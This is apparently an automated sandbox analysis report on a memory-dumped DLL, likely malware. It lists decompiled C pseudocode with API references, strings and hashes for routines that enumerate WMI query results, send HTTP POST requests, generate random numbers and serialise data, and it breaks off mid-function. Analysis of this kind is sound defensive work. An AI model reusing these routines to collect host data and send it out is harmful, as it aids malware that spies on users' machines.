Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085f8
0x100085fe
0x10008603

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

APIs

Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
SysFreeString.OLEAUT32(?), ref: 1000DF82
SysFreeString.OLEAUT32(?), ref: 1000DF8B

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

TRUE, xrefs: 1000DDA7
FALSE, xrefs: 1000DDAE

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

APIs

memset.MSVCRT ref: 1000E69A
memset.MSVCRT ref: 1000E6AB
memset.MSVCRT ref: 1000E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E785

Strings

POST, xrefs: 1000E84B

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701

Strings

advapi32.dll, xrefs: 100116C3
CryptAcquireContextA, xrefs: 100116DD
CryptReleaseContext, xrefs: 100116FB
CryptGenRandom, xrefs: 100116EC

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764

Uniqueness

Uniqueness Score: -1.00%

Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

APIs

_snprintf.MSVCRT ref: 10012146
localeconv.MSVCRT ref: 10012161
strchr.MSVCRT ref: 10012173
strchr.MSVCRT ref: 10012184
strchr.MSVCRT ref: 10012192
strchr.MSVCRT ref: 100121B7

Strings

%.*g, xrefs: 1001213D

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10010332
qsort.MSVCRT ref: 100105B0

Strings

true, xrefs: 10010309
%I64d, xrefs: 10010324
false, xrefs: 10010315
null, xrefs: 100102F7

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x15d0590
					_t125 =  *0x1001e68c; // 0x164fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x15d0590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
